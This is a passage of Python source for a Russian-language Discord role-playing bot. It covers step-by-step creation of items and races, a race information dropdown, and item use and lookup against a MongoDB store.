msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return
else:
try:
await msg.delete()
await msg1.delete()
except Exception:
pass
if msg.content in ["hp+", "mana+", "damage+", "armor+", "mana-"]:
item.update({ 'style': msg.content})
else:
await ctx.send(f'Вы указали не действительный стиль предмета, выберите 1 из ({", ".join(["hp+", "mana+", "damage+", "armor+", "mana-"])}) и повторите создание снова!')
return
style = msg.content
try:
await message.edit(embed = embed(type, name, style, f"Укажите процент увелечения `{style}`"))
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return
else:
try:
await msg.delete()
except Exception:
pass
try:
act = float(msg.content)
except Exception:
await ctx.send("Требовалось указать __число__!")
return
item.update({ 'act': act})
await message.edit(embed = embed(type, name, style, act, "Укажите изображение питомца:"))
image = await image_f(message, ctx)
if image == False:
return
else:
item.update({'image': image})
await message.edit(embed = embed(type, name, style, act, image, f"Укажите процент атаки `{name}`"))
try:
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return
else:
try:
await msg.delete()
except Exception:
pass
try:
chance = int(msg.content)
except Exception:
await ctx.send("Требовалось указать __число__!")
return
if chance < 1 or chance > 100:
await ctx.send(f"Требовалось указать число от 1 до 100!")
return
else:
item.update({ 'chance': chance})
await message.edit(embed = embed(type, name, style, act, image, chance, f"Укажите урон `{name}`"))
try:
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return
else:
try:
await msg.delete()
except Exception:
pass
try:
damage = int(msg.content)
except Exception:
await ctx.send("Требовалось указать __число__!")
return
item.update({ 'damage': damage})
await message.edit(embed = embed(type, name, style, act, image, chance, damage, f"Укажите качество питомца: "))
quality = await quality_f(message, ctx)
if quality == False:
return
else:
item.update({'quality': quality})
await message.edit(embed = embed(type, name, style, act, image, chance, damage, quality, f'Укажите описание предмета или `none`: (макс 300 символов)'))
description = await description_f(message, ctx)
if description == False:
return
else:
item.update({'description': description})
await message.edit(embed = embed( type, name, style, act, image, chance, damage, quality, description, f'Укажите описание предмета или `none`: (макс 2000 символов)'))
action_m = await action_m_f(message, ctx)
if action_m == False:
return
else:
item.update({'action_m': action_m})
await message.edit(embed = embed(type, name, style, act, image, chance, damage, quality, description, action_m, f'Укажите названия рас, которые могут использовать этот предмет или `all`:'))
race_u = await race_u_f(message, ctx, server)
if race_u == False:
return
else:
item.update({'race_u': race_u})
await message.edit(embed = embed(type, name, style, act, image, chance, damage, quality, description, action_m, race_u, f'Укажите элеменет или `none`:'))
element = await element_f(message, ctx)
if element == False:
return
else:
item.update({'element': element})
await message.edit(embed = embed(type, name, style, act, image, chance, damage, quality, description, action_m, race_u, element, f'Укажите эмоджи предмета:'))
emoji_v = await emoji_f(message, ctx)
if emoji_v == False:
return
else:
item.update({'emoji': emoji_v})
await message.edit(embed = embed( type, name, style, act, image, chance, damage, quality, description, action_m, race_u, element, emoji_v))
elif type == 'material':
def embed(type = 'Не указано', name = 'Не указано', image = 'Не указано', quality = 'Не указано', description = 'Не указано', race_u = 'Не указано', emoji_v = 'Не указано'):
nonlocal server
emb = discord.Embed(title = "Создание предмета", description = "", color=server['embed_color'])
emb.add_field(name = "Тип предмета", value = f"{type}")
emb.add_field(name = "Имя предмета", value = f"{name}")
if image != 'Не указано' and image != 'none' and image != "Укажите изображение предмета:" and image != None:
emb.set_thumbnail(url = image)
emb.add_field(name = "Качество предмета", value = f"{quality}")
emb.add_field(name = "Описание предмета", value = f"{description}")
if race_u != 'Не указано' and race_u != 'Укажите названия рас, которые могут использовать этот предмет или `all`:' and race_u != 'all' and race_u != None:
emb.add_field(name = "Расы с возможностью использовать", value = f"{','.join(str(x) for x in race_u)}")
else:
emb.add_field(name = "Расы с возможностью использовать", value = f"{race_u}")
emb.add_field(name = "Эмоджи", value = f"{emoji_v}")
emb.set_footer(text = 'Отправляйте сообщения в чат без использованеи команд, на одно указание у вас 60 сек.')
return emb
await message.edit(embed = embed(type, f'Укажите название предмета: (не более 150 символов)'))
name = await name_f(message, ctx)
if name == False:
return
else:
item.update({ 'name': name})
await message.edit(embed = embed(type, name, "Укажите изображение предмета:"))
image = await image_f(message, ctx)
if image == False:
return
else:
item.update({'image': image})
await message.edit(embed = embed(type, name, image, f"Укажите качество предмета: "))
quality = await quality_f(message, ctx)
if quality == False:
return
else:
item.update({'quality': quality})
await message.edit(embed = embed(type, name, image, quality, f'Укажите описание предмета или `none`: (макс 500 символов)'))
description = await description_f(message, ctx)
if description == False:
return
else:
item.update({'description': description})
await message.edit(embed = embed(type, name, image, quality, description, f'Укажите названия рас, которые могут использовать этот предмет или `all`:'))
race_u = await race_u_f(message, ctx, server)
if race_u == False:
return
else:
item.update({'race_u': race_u})
await message.edit(embed = embed(type, name, image, quality, description, race_u, f'Укажите эмоджи предмета:'))
emoji_v = await emoji_f(message, ctx)
if emoji_v == False:
return
else:
item.update({'emoji': emoji_v})
await message.edit(embed = embed( type, name, image, quality, description, race_u, emoji_v))
elif type == 'recipe':
def embed(type = 'Не указано', name = 'Не указано', act = 'Не указано', ndi = 'Не указано', create = 'Не указано', uses = 'Не указано', image = 'Не указано', quality = 'Не указано', description = 'Не указано', action_m = 'Не указано', race_u = 'Не указано', emoji_v = 'Не указано'):
nonlocal server
emb = discord.Embed(title = "Создание предмета", description = "", color=server['embed_color'])
emb.add_field(name = "Тип предмета", value = f"{type}")
emb.add_field(name = "Имя предмета", value = f"{name}")
if act != 'Не указано' and act != 'Укажите id предметов для крафта: (максимум 500 предметов)':
emb.add_field(name = "Используемые предметы", value = f"{', '.join(str(x) for x in act)}")
else:
emb.add_field(name = "Используемые предметы", value = f"{act}")
if ndi != 'Не указано' and ndi != 'Укажите не удаляемые предметы' and ndi != None:
emb.add_field(name = "Не удаляемые предметы", value = f"{', '.join(str(x) for x in ndi)}")
else:
emb.add_field(name = "Не удаляемые предметы", value = f"{ndi}")
if create != 'Не указано' and create != 'Укажите id предметов которые будут созданы: (максимум 500 предметов)':
emb.add_field(name = "Создаваемые предметы", value = f"{', '.join(str(x) for x in create)}")
else:
emb.add_field(name = "Создаваемые предметы", value = f"{create}")
if image != 'Не указано' and image != 'none' and image != "Укажите изображение предмета:" and image != None:
emb.set_thumbnail(url = image)
emb.add_field(name = "Использований", value = f"{uses}")
emb.add_field(name = "Качество предмета", value = f"{quality}")
emb.add_field(name = "Описание предмета", value = f"{description}")
emb.add_field(name = "Сообщение при активации", value = f"{action_m}")
if race_u != 'Не указано' and race_u != 'Укажите названия рас, которые могут использовать этот предмет или `all`:' and race_u != 'all' and race_u != None:
emb.add_field(name = "Расы с возможностью использовать", value = f"{', '.join(str(x) for x in race_u)}")
else:
emb.add_field(name = "Расы с возможностью использовать", value = f"{race_u}")
emb.add_field(name = "Эмоджи", value = f"{emoji_v}")
emb.set_footer(text = 'Отправляйте сообщения в чат без использованеи команд, на одно указание у вас 60 сек.')
return emb
await message.edit(embed = embed(type, f'Укажите название предмета: (не более 150 символов)'))
name = await name_f(message, ctx)
if name == False:
return
else:
item.update({ 'name': name})
try:
b = 500
act = []
emb = discord.Embed(title = "",
description = "Укажите id предметов для крафта, формат: 12 12 1 2 2\nЕсли вы хотите увеличить колличество предмета то просто укажите его повторно, пример: 11 11 (будет удалено 2 предмета с id 11)", color=server['embed_color'])
msg1 = await ctx.send(embed = emb)
await message.edit(embed = embed(type, name, f"Укажите id предметов для крафта: (максимум 500 предметов)"))
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return
else:
try:
await msg.delete()
await msg1.delete()
except Exception:
pass
try:
try:
act1 = msg.content.split()
a = 0
for i in act1:
if a > b:
await ctx.send(f"Вы указали количество предметов для крафта больше допустимого ({b})")
return
a += 1
act.append(int(i))
except Exception:
await ctx.send("Требовалось указать __число__, повторите настройку ещё раз.")
return
for i in act:
server['items'][str(i)]
except Exception:
await ctx.send("Требовалось указать __id__ (число) существующего предмета, повторите настройку ещё раз.")
return
item.update({'act': act})
try:
emb = discord.Embed(title = "Укажите предметы (id) которые не будут удаляться: (Пример: 1 2 8)",
description = "`none` - при крафте все предметы удаляться из инвенторя\n", color=server['embed_color'])
msg1 = await ctx.send(embed = emb)
await message.edit(embed = embed(type, name, act, f"Укажите не удаляемые предметы"))
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return
else:
try:
await msg.delete()
await msg1.delete()
except Exception:
pass
if msg.content == 'none':
item.update({ 'ndi': None})
ndi = None
else:
ms_c_i = list(int(x) for x in msg.content.split())
l = set(act) & set(ms_c_i)
if dict(set(l) & set(msg.content.split())) == {}:
ndi = list(int(x) for x in msg.content.split())
else:
await ctx.send("Требовалось указать предметы (число) из крафта которые не будут удаляться!")
return
item.update({ 'ndi': ndi})
try:
b = 500
emb = discord.Embed(title = "",
description = "Укажите id создаваемых предметов, формат: 12 12 1 2 2\nЕсли вы хотите увеличить колличество предмета то просто укажите его повторно, пример: 11 11 (будет создано 2 предмета с id 11)", color=server['embed_color'])
msg1 = await ctx.send(embed = emb)
await message.edit(embed = embed(type, name, act, ndi, f"Укажите id предметов которые будут созданы: (максимум 500 предметов)"))
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return
else:
try:
await msg.delete()
await msg1.delete()
except Exception:
pass
try:
try:
cr = []
cr1 = msg.content.split()
a = 0
for i in cr1:
if a > b:
await ctx.send(f"Вы указали количество предметов для крафта больше допустимого ({b})")
return
a += 1
cr.append(int(i))
except Exception:
await ctx.send("Требовалось указать __число__, повторите настройку ещё раз.")
return
for i in cr:
server['items'][str(i)]
except Exception:
await ctx.send("Требовалось указать __id__ (число) существующего предмета, повторите настройку ещё раз.")
return
create = cr
item.update({'create': cr})
try:
await message.edit(embed = embed(type, name, act, ndi, create, "Укажите сколько раз можно использовать предмет (0 - бесконечность):"))
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return
else:
try:
await msg.delete()
except Exception:
pass
try:
uses = int(msg.content)
except:
await ctx.send("Требовалось указать число!")
return
if uses < 0:
await ctx.send("Укажите число больше или равное нулю!")
return
item.update({'uses': uses})
await message.edit(embed = embed(type, name, act, ndi, create, uses, "Укажите изображение предмета:"))
image = await image_f(message, ctx)
if image == False:
return
else:
item.update({'image': image})
await message.edit(embed = embed(type, name, act, ndi, create, uses, image, f"Укажите качество предмета: "))
quality = await quality_f(message, ctx)
if quality == False:
return
else:
item.update({'quality': quality})
await message.edit(embed = embed(type, name, act, ndi, create, uses, image, quality, f'Укажите описание предмета или `none`: (макс 300 символов)'))
description = await description_f(message, ctx)
if description == False:
return
else:
item.update({'description': description})
await message.edit(embed = embed(type, name, act, ndi, create, uses, image, quality, description, f'Укажите описание предмета или `none`: (макс 2000 символов)'))
action_m = await action_m_f(message, ctx)
if action_m == False:
return
else:
item.update({'action_m': action_m})
await message.edit(embed = embed(type, name, act, ndi, create, uses, image, quality, description, action_m, f'Укажите названия рас, которые могут использовать этот предмет или `all`:'))
race_u = await race_u_f(message, ctx, server)
if race_u == False:
return
else:
item.update({'race_u': race_u})
await message.edit(embed = embed(type, name, act, ndi, create, uses, image, quality, description, action_m, race_u, f'Укажите эмоджи предмета:'))
emoji_v = await emoji_f(message, ctx)
if emoji_v == False:
return
else:
item.update({'emoji': emoji_v})
await message.edit(embed = embed( type, name, act, ndi, create, uses, image, quality, description, action_m, race_u, emoji_v))
elif type == 'role':
def embed(type = 'Не указано', name = 'Не указано', act = 'Не указано', style = 'Не указано', image = 'Не указано', quality = 'Не указано', description = 'Не указано', action_m = 'Не указано', race_u = 'Не указано', emoji_v = 'Не указано'):
nonlocal server
emb = discord.Embed(title = "Создание предмета", description = "", color=server['embed_color'])
emb.add_field(name = "Тип предмета", value = f"{type}")
emb.add_field(name = "Имя предмета", value = f"{name}")
if act == 'Не указано' or act == f"Укажите [id](https://support.discord.com/hc/ru/articles/206346498-%D0%93%D0%B4%D0%B5-%D0%BC%D0%BD%D0%B5-%D0%BD%D0%B0%D0%B9%D1%82%D0%B8-ID-%D0%BF%D0%BE%D0%BB%D1%8C%D0%B7%D0%BE%D0%B2%D0%B0%D1%82%D0%B5%D0%BB%D1%8F-%D1%81%D0%B5%D1%80%D0%B2%D0%B5%D1%80%D0%B0-%D1%81%D0%BE%D0%BE%D0%B1%D1%89%D0%B5%D0%BD%D0%B8%D1%8F-) роли `{name}`":
emb.add_field(name = "Id роли", value = f"{act}")
else:
emb.add_field(name = "Id роли", value = f"<@&{act}>")
emb.add_field(name = "Стиль предмета", value = f"{style}")
if image != 'Не указано' and image != 'none' and image != "Укажите изображение предмета:" and image != None:
emb.set_thumbnail(url = image)
emb.add_field(name = "Качество предмета", value = f"{quality}")
emb.add_field(name = "Описание предмета", value = f"{description}")
emb.add_field(name = "Сообщение при активации", value = f"{action_m}")
if race_u != 'Не указано' and race_u != 'Укажите названия рас, которые могут использовать этот предмет или `all`:' and race_u != 'all' and race_u != None:
emb.add_field(name = "Расы с возможностью использовать", value = f"{','.join(str(x) for x in race_u)}")
else:
emb.add_field(name = "Расы с возможностью использовать", value = f"{race_u}")
emb.add_field(name = "Эмоджи", value = f"{emoji_v}")
emb.set_footer(text = 'Отправляйте сообщения в чат без использованеи команд, на одно указание у вас 60 сек.')
return emb
await message.edit(embed = embed(type, f'Укажите название предмета: (не более 150 символов)'))
name = await name_f(message, ctx)
if name == False:
return
else:
item.update({ 'name': name})
try:
await message.edit(embed = embed(type, name, f"Укажите [id](https://support.discord.com/hc/ru/articles/206346498-%D0%93%D0%B4%D0%B5-%D0%BC%D0%BD%D0%B5-%D0%BD%D0%B0%D0%B9%D1%82%D0%B8-ID-%D0%BF%D0%BE%D0%BB%D1%8C%D0%B7%D0%BE%D0%B2%D0%B0%D1%82%D0%B5%D0%BB%D1%8F-%D1%81%D0%B5%D1%80%D0%B2%D0%B5%D1%80%D0%B0-%D1%81%D0%BE%D0%BE%D0%B1%D1%89%D0%B5%D0%BD%D0%B8%D1%8F-) роли `{name}`"))
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return
else:
try:
await msg.delete()
except Exception:
pass
try:
act = int(msg.content)
except Exception:
await ctx.send("Требовалось указать id роли, повторите настройку ещё раз.")
return
role = ctx.guild.get_role(act)
try:
act = role.id
except Exception:
await ctx.send("Требовалось указать id существующей роли, повторите настройку ещё раз.")
return
item.update({ 'act': act})
text = "`add` - добавляет роль при использовании.\n`remove` - удаляет роль при использовании.\n"
try:
emb = discord.Embed(title = "Стили:",
description = text, color=server['embed_color'])
msg1 = await ctx.send(embed = emb)
await message.edit(embed = embed(type, name, act, f"Укажите стиль `{name}`"))
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return
else:
try:
await msg.delete()
await msg1.delete()
except Exception:
pass
if msg.content in ['add', 'remore']:
item.update({ 'style': msg.content})
else:
await ctx.send("Вы указали не действительный стиль предмета, выберите 1 из (add, remore) и повторите создание снова!")
return
style = msg.content
await message.edit(embed = embed(type, name, act, style, "Укажите изображение предмета:"))
image = await image_f(message, ctx)
if image == False:
return
else:
item.update({'image': image})
await message.edit(embed = embed(type, name, act, style, image, f"Укажите качество предмета: "))
quality = await quality_f(message, ctx)
if quality == False:
return
else:
item.update({'quality': quality})
await message.edit(embed = embed(type, name, act, style, image, quality, f'Укажите описание предмета или `none`: (макс 300 символов)'))
description = await description_f(message, ctx)
if description == False:
return
else:
item.update({'description': description})
await message.edit(embed = embed(type, name, act, style, image, quality, description, f'Укажите описание предмета или `none`: (макс 2000 символов)'))
action_m = await action_m_f(message, ctx)
if action_m == False:
return
else:
item.update({'action_m': action_m})
await message.edit(embed = embed(type, name, act, style, image, quality, description, action_m, f'Укажите названия рас, которые могут использовать этот предмет или `all`:'))
race_u = await race_u_f(message, ctx, server)
if race_u == False:
return
else:
item.update({'race_u': race_u})
await message.edit(embed = embed(type, name, act, style, image, quality, description, action_m, race_u, f'Укажите эмоджи предмета:'))
emoji_v = await emoji_f(message, ctx)
if emoji_v == False:
return
else:
item.update({'emoji': emoji_v})
await message.edit(embed = embed( type, name, act, style, image, quality, description, action_m, race_u, emoji_v))
if type == 'prop':
def embed(type = 'Не указано', name = 'Не указано', image = 'Не указано', description = 'Не указано', action_m = 'Не указано', emoji_v = 'Не указано'):
nonlocal server
emb = discord.Embed(title = "Создание предмета", description = "", color=server['embed_color'])
emb.add_field(name = "Тип предмета", value = f"{type}")
emb.add_field(name = "Имя предмета", value = f"{name}")
if image != 'Не указано' and image != 'none' and image != "Укажите изображение предмета:" and image != None:
emb.set_thumbnail(url = image)
emb.add_field(name = "Описание предмета", value = f"{description}")
emb.add_field(name = "Сообщение при активации", value = f"{action_m}")
emb.add_field(name = "Эмоджи", value = f"{emoji_v}")
emb.set_footer(text = 'Отправляйте сообщения в чат без использованеи команд, на одно указание у вас 60 сек.')
return emb
await message.edit(embed = embed(type, f'Укажите название предмета: (не более 150 символов)'))
name = await name_f(message, ctx)
if name == False:
return
else:
item.update({ 'name': name})
await message.edit(embed = embed(type, name, "Укажите изображение предмета:"))
image = await image_f(message, ctx)
if image == False:
return
else:
item.update({'image': image})
await message.edit(embed = embed(type, name, image, f'Укажите описание предмета или `none`: (макс 500 символов)'))
description = await description_f(message, ctx)
if description == False:
return
else:
item.update({'description': description})
await message.edit(embed = embed(type, name, image, description, f'Укажите описание предмета или `none`: (макс 2000 символов)'))
action_m = await action_m_f(message, ctx)
if action_m == False:
return
else:
item.update({'action_m': action_m})
await message.edit(embed = embed(type, name, image, description, action_m, f'Укажите эмоджи предмета:'))
emoji_v = await emoji_f(message, ctx)
if emoji_v == False:
return
else:
item.update({'emoji': emoji_v})
await message.edit(embed = embed( type, name, image, description, action_m, emoji_v))
try:
l = server['items']
lst = []
for i in l.keys():
lst.append(int(i))
l = max(lst)+1
except Exception:
l = 1
await ctx.send(f"Предмет с id {l} создан!\n{item}")
server = servers.find_one({"server": ctx.guild.id})
il = server['items']
il.update({f'{l}': item})
servers.update_one({'server':ctx.guild.id},{"$set":{'items': il}})
@commands.command(usage = '-', description = 'Создание расы.')
async def create_race(self, ctx):
global servers
if funs.roles_check(ctx.author, ctx.guild.id) == False:
await ctx.send("У вас недостаточно прав для использования этой команды!")
return
server = servers.find_one({'server':ctx.guild.id})
race = {}
def embed(name, hp = "не указано", mana = "не указано", items = "не указано", description = "не указано", image = 'Не указано'):
nonlocal server
emb = discord.Embed(title = "Создание расы", description = "", color=server['embed_color'])
emb.add_field(name = "Название:", value = f"{name}")
emb.add_field(name = "Максимальное здоровье:", value = f"{hp}")
emb.add_field(name = "Максимальная мана:", value = f"{mana}")
emb.add_field(name = "Начальные предметы:", value = f"{items}")
emb.add_field(name = "Описание:", value = f"{description}")
if image != 'Не указано' and image != 'none' and image != "Укажите изображение расы:":
emb.set_thumbnail(url = image)
return emb
message = await ctx.send(embed = embed("не указано"))
try:
await message.edit(embed = embed('Укажите название расы (не более 100-та символов)'))
msg = await self.bot.wait_for('message', timeout=120.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return
else:
try:
await msg.delete()
except Exception:
pass
if len(msg.content) > 100:
await ctx.send('Название больше 100-та символов!')
return
else:
name = msg.content
try:
await message.edit(embed = embed(name, 'Укажите максимальное здоровье для расы'))
msg = await self.bot.wait_for('message', timeout=120.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return
else:
try:
await msg.delete()
except Exception:
pass
try:
hp = int(msg.content)
race.update({'hp': int(msg.content)})
except Exception:
await ctx.send('Укажите число!')
return
try:
await message.edit(embed = embed(name, hp, 'Укажите максимальную ману для расы'))
msg = await self.bot.wait_for('message', timeout=120.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return
else:
try:
await msg.delete()
except Exception:
pass
try:
mana = int(msg.content)
race.update({'mana': int(msg.content)})
except Exception:
await ctx.send('Укажите число!')
return
try:
b = 50
act = []
emb = discord.Embed(title = "",
description = "Укажите id предметов для расы, формат: 12 12 1 2 2\nЕсли вы хотите увеличить колличество предмета то просто укажите его повторно, пример: 11 11 (будет добавлено 2 предмета с id 11)\nУкажите `none` если ничего.", color=server['embed_color'])
msg1 = await ctx.send(embed = emb)
await message.edit(embed = embed(name, hp, mana, f"Укажите id предметов для расы или `none`: (максимум {b} предметов)"))
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return
else:
try:
await msg.delete()
await msg1.delete()
except Exception:
pass
if msg.content == 'none':
act = None
else:
try:
try:
act1 = msg.content.split()
a = 0
for i in act1:
if a > b:
await ctx.send(f"Вы указали количество предметов больше допустимого ({b})")
return
a += 1
act.append(int(i))
except Exception:
await ctx.send("Требовалось указать __число__, повторите настройку ещё раз.")
return
for i in act:
server['items'][str(i)]
except Exception:
await ctx.send("Требовалось указать __id__ (число) существующего предмета, повторите настройку ещё раз.")
return
items = act
race.update({'items': act})
try:
await message.edit(embed = embed(name, hp, mana, items, f'Укажите описание расы или `none`: (макс 300 символов)'))
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return
else:
try:
await msg.delete()
except Exception:
pass
description = str(msg.content)
if description == 'none':
race.update({ 'description': None})
description = None
elif len(description) > 0 and len(description) < 301:
race.update({ 'description': msg.content})
description = msg.content
else:
await ctx.send("Требовалось указать описание (макс 300 символов) или `none`, повторите настройку ещё раз!")
return
try:
text = "Требуется указать __ссылку__ на изображение или `none`"
emb = discord.Embed(title = "Изображение:",
description = text, color=server['embed_color'])
msg1 = await ctx.send(embed = emb)
await message.edit(embed = embed(name, hp, mana, items, description, "Укажите изображение расы:"))
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return
else:
try:
await msg.delete()
except Exception:
pass
if msg.content != 'none':
try:
emb1 = discord.Embed(title = "Изображение", color=server['embed_color'])
emb1.set_thumbnail(url = msg.content)
msg2 = await ctx.send(embed = emb1)
except Exception:
await ctx.send("Требовалось указать __ссылку__, повторите настройку ещё раз.")
return
else:
msg.content = None
race.update({'image': msg.content})
image = str(msg.content)
try:
await msg1.delete()
await msg2.delete()
except Exception:
pass
await message.edit(content = 'Раса создана', embed = embed(name, hp, mana, items, description, image))
server = servers.find_one({"server": ctx.guild.id})
il = server['races']
il.update({f'{name}': race})
servers.update_one({'server':ctx.guild.id},{"$set":{'races': il}})
@commands.command(usage = '-', description = 'Информация о расах.')
async def race_info(self, ctx):
server = servers.find_one({"server": ctx.guild.id})
def list_counter(list):
ld = {}
for i in list:
if i not in ld.keys():
ld[i] = 1
elif i in ld.keys():
ld[i] += 1
list = []
for el in ld.keys():
list.append(f'{el} x{ld[el]}')
return list
async def inf(race, msg):
nonlocal ctx
nonlocal server
r = server['races'][race]
if r['items'] == None:
invv = 'Пусто'
else:
l = []
for i in r['items']: l.append(server['items'][str(i)]['name'])
invv = list_counter(l)
emb = discord.Embed( description = f'**🦄 | {race}**', color=server['embed_color'])
emb.add_field(name = 'Данные', value = f'<:heart:886874654072008705> Начальное здоровье: {r["hp"]}\n<:c_mana:886893705594818610> Начальная мана: {r["mana"]}\n<:p_backpack:886909262712930325> Начальные предметы: \n`{", ".join(invv)}`')
if r['description'] == None:
emb.add_field(name = 'Описание', value = f'Ничего не известно | (отсутствует)')
else:
emb.add_field(name = 'Описание', value = f'{r["description"]}')
if r['image'] != None:
emb.set_thumbnail(url = i['image'])
await msg.edit(embed = emb, view = None)
class Dropdown(discord.ui.Select):
def __init__(self, races, ctx, msg, emb):
options = []
for k in races.keys():
options.append(discord.SelectOption(label=f'{k}'))
super().__init__(placeholder='Выберите расу...', min_values=1, max_values=1, options=options)
async def callback(self, interaction: discord.Interaction):
if ctx.author.id == interaction.user.id:
await inf(self.values[0], msg)
self.view.stop()
else:
await interaction.response.send_message(f'Откройте свой инвентарь!', ephemeral = True)
class DropdownView(discord.ui.View):
def __init__(self, inv, ctx, msg, emb):
super().__init__()
self.add_item(Dropdown(inv, ctx, msg, emb))
emb = discord.Embed(title = '🦄 | Расы', description = f'Выберете о какой расе вы хотите узнать информацию', color=server['embed_color'])
msg = await ctx.send(embed = emb)
await msg.edit(embed = emb, view=DropdownView(server['races'], ctx, msg, emb))
@commands.command(usage = '(item_name)', description = 'Использовать предмет из инвентаря.')
async def use(self, ctx, *, i_name:str):
user = funs.user_check(ctx.author, ctx.guild)
server = servers.find_one({"server": ctx.guild.id})
s_i = []
for i in user['inv']:
print(i['name'])
print(fuzz.token_sort_ratio(i_name, i['name']), fuzz.ratio(i_name,i['name']), i_name == i['name'])
if fuzz.token_sort_ratio(i_name, i['name']) > 80 or fuzz.ratio(i_name,i['name']) > 80 or i_name == i['name']:
s_i.append(i)
if len(s_i) == 1:
emb = discord.Embed(description = f'Вы хотите использовать **{s_i[0]["name"]}** ?', title = '<:inventory_b:886909340550823936> | Инвентарь', color=server['embed_color'])
msg = await ctx.send(embed= emb)
r = await funs.reactions_check( ["✅", "❌"], ctx.author, msg, True)
if r != 'Timeout':
if str(r.emoji) == "✅":
print('Использование')
else:
print('Отмена')
else:
await ctx.send('Время вышло')
if len(s_i) == 0:
emb = discord.Embed(title = '<:inventory_b:886909340550823936> | Инвентарь', description = f'В вашем инвентаре не было найдено такого предмета!\nПопробуйте указать более точное название или осмотрите свой инвентарь более подробно!', color=server['embed_color'])
msg = await ctx.send(embed= emb)
if len(s_i) > 1:
inv = {}
items = []
for i in server['items'].keys():
items.append(server['items'][i])
for i in s_i:
u = i.copy()
del i['iid']
if i in items:
if i['name'] in list(inv.keys()):
inv.update({ i['name']: { 'it':i, 'count': inv[i['name']]['count']+1 } })
else:
inv.update({ i['name']: { 'it':i, 'count': 1 } })
if i not in items:
if f'{i["name"]} (#{u["iid"]})' in list(inv.keys()):
inv.update({ f'{i["name"]} (#{u["iid"]})': { 'it':i, 'count': inv[i['name']]['count']+1 } })
else:
inv.update({ f'{i["name"]} (#{u["iid"]})': { 'it':i, 'count': 1 } })
class Dropdown(discord.ui.Select):
def __init__(self, inv, ctx, msg, emb):
options = []
for k in inv:
options.append(discord.SelectOption(label=f'{k}'))
super().__init__(placeholder='Выберите используемый предмет...', min_values=1, max_values=1, options=options)
async def callback(self, interaction: discord.Interaction):
if ctx.author.id == interaction.user.id:
await interaction.response.send_message(f'{self.values[0]}', ephemeral = True)
self.view.stop()
else:
await interaction.response.send_message(f'Откройте свой инвентарь!', ephemeral = True)
class DropdownView(discord.ui.View):
def __init__(self, inv, ctx, msg, emb):
super().__init__()
self.add_item(Dropdown(inv, ctx, msg, emb))
text = ''
n = 0
for k in inv:
i = inv[k]
n += 1
text += f'{n}# {k} x{i["count"]}\n'
emb = discord.Embed(title = '<:inventory_b:886909340550823936> | Инвентарь', description = f'В инвентаре найдено несколько совпадений:\n{text}', color=server['embed_color'])
msg = await ctx.send(embed = emb)
await msg.edit(embed = emb, view=DropdownView(inv, ctx, msg, emb))
@commands.command(usage = '(item_name)', description = 'Информация о предмете.')
async def item_info(self, ctx, *, i_name:str):
user = funs.user_check(ctx.author, ctx.guild)
server = servers.find_one({"server": ctx.guild.id})
async def inf(item, msg):
nonlocal ctx
nonlocal server
i = funs.item_info(item, ctx.guild.id)
emb = discord.Embed(description = f"**{i['emoji']} | {i['name']}**", color=server['embed_color'])
emb.add_field( name = f'Данные', value= f"Тип: {i['type']}\n\n{i['act_title']}\n\nРедкость: {i['quality']}\nЭлемент: {i['element']}\n{i['race_u']}", inline = True )
emb.add_field( name = f'Описание', value= f"{i['description']}", inline = True )
if i['image'] != None:
emb.set_thumbnail(url = i['image'])
await msg.edit(embed = emb, view = None)
s_i = []
for i in user['inv']:
if fuzz.token_sort_ratio(i_name, i['name']) > 80 or fuzz.ratio(i_name,i['name']) > 80 or i_name == i['name']:
s_i.append(i)
inv = {}
items = []
for i in server['items'].keys():
items.append(server['items'][i])
for i in s_i:
u = i.copy()
del i['iid']
if i in items:
if i['name'] in list(inv.keys()):
inv.update({ i['name']: { 'it':i, 'count': inv[i['name']]['count']+1 } })
else:
inv.update({ i['name']: { 'it':i, 'count': 1 } })
if i not in items:
if f'{i["name"]} (#{u["iid"]})' in list(inv.keys()):
inv.update({ f'{i["name"]} (#{u["iid"]})': { 'it':i, 'count': inv[i['name']]['count']+1 } })
else:
inv.update({ f'{i["name"]} (#{u["iid"]})': { 'it':i, 'count': 1 } })
